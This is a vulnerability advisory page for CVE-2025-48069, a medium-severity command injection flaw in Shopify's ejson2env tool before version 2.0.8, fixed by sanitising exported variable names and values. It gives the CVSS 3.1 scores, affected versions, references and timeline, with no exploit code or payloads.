Command Injection Vulnerability in ejson2env Tool by Shopify
CVE-2025-48069

6.6MEDIUM

Key Information:

Vendor: Shopify
Status: Ejson2env
Vendor: CVE Published:; 21 May 2025

What is CVE-2025-48069?

The ejson2env tool by Shopify contains a vulnerability that allows for potential command injection due to inadequate output sanitization when exporting EJSON secrets as environment variables. Prior to version 2.0.8, the tool outputs export statements which may inadvertently include malicious content in variable names or values. If the output is improperly used in command execution, it may enable attackers to execute unintended commands on the host system. Users are advised to upgrade to version 2.0.8, which includes sanitization measures, and to exercise caution by avoiding the decryption of untrusted user secrets and the unfiltered evaluation of the tool's output.

Affected Version(s)

ejson2env < 2.0.8

References

https://github.com/Shopify/ejson2env/security/advisories/...

x_refsource_CONFIRM

https://github.com/Shopify/ejson2env/commit/592b3ceea967f...

x_refsource_MISC

CVSS V3.1

Score:

6.6

Severity:

MEDIUM

Confidentiality:

High

Integrity:

High

Availability:

High

Attack Vector:

Network

Attack Complexity:

High

Privileges Required:

High

User Interaction:

None

Scope:

Unchanged

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
May 21, 2025
Vulnerability Reserved
May 15, 2025